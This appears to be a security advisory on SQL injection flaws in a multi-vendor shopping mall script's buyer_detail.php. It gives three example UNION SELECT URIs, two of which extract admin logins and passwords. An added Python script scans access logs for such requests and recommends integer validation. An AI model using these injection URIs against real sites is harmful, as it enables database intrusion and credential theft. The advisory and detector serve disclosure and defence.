Pre Multi-Vendor Shopping Malls 'buyer_detail.php' Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues. The following example URIs are available:

http://www.example.com/[path]/buyer_detail.php?prodid=350&custid=240&sid=-111+UNION+ALL+SELECT+1,2,concat(user(),0x3a,version()),4,5--&cid=26

http://www.example.com/[path]/buyer_detail.php?prodid=350&custid=240&sid=-111+UNION+ALL+SELECT+1,2,concat(login,0x3a,password),4,5+FROM+admin--&cid=26

http://www.example.com/[path]/buyer_detail.php?prodid=350&custid=240&sid=111&cid=-26+UNION+ALL+SELECT+1,concat(login,0x3a,password),3,4+FROM+admin--
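
A defensive check for the requests shown above, as an added example that is not part of the original advisory: it scans web access-log lines for buyer_detail.php requests whose prodid, custid, sid or cid value is not a plain integer. It assumes those four parameters only ever carry numeric IDs (as in the URIs above); the log lines, the /shop/ path and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: these parameters are numeric IDs, as in the advisory's URIs.
ID_PARAMS = ("prodid", "custid", "sid", "cid")
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
SQL_HINT_RE = re.compile(r"\b(union|select|concat|from)\b|--|0x[0-9a-f]+", re.I)

# Constructed sample log lines (combined log format, documentation IP range).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /shop/buyer_detail.php'
    '?prodid=350&custid=240&sid=111&cid=26 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Jan/2024:10:00:05 +0000] "GET /shop/buyer_detail.php'
    '?prodid=350&custid=240&sid=-111+UNION+ALL+SELECT+1,2,'
    'concat(user(),0x3a,version()),4,5--&cid=26 HTTP/1.1" 200 5188',
    '192.0.2.44 - - [01/Jan/2024:10:00:09 +0000] "GET /shop/buyer_detail.php'
    '?prodid=350&custid=240&sid=111&cid=26%27 HTTP/1.1" 500 312',
    '192.0.2.10 - - [01/Jan/2024:10:00:12 +0000] "GET /shop/index.php'
    '?sid=abc HTTP/1.1" 200 2048',
]

def check_request(target):
    """Return (param, value, reason) findings for one request target."""
    parts = urlsplit(target)
    if not parts.path.endswith("/buyer_detail.php"):
        return []
    findings = []
    # parse_qs decodes %xx escapes and '+' the same way the server does.
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name.lower() not in ID_PARAMS:
            continue
        for value in values:
            if re.fullmatch(r"\d{1,10}", value):
                continue  # plain integer: expected shape
            reason = "sql-keywords" if SQL_HINT_RE.search(value) else "non-numeric"
            findings.append((name, value, reason))
    return findings

def scan_log(lines):
    """Return (line_number, param, value, reason) for every suspicious value."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match:
            hits.extend((lineno, *f) for f in check_request(match.group(1)))
    return hits

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The same integer-only rule, enforced in the application before the values reach the query (or replaced by bound parameters), is what removes the injection point; the log scan only surfaces attempts.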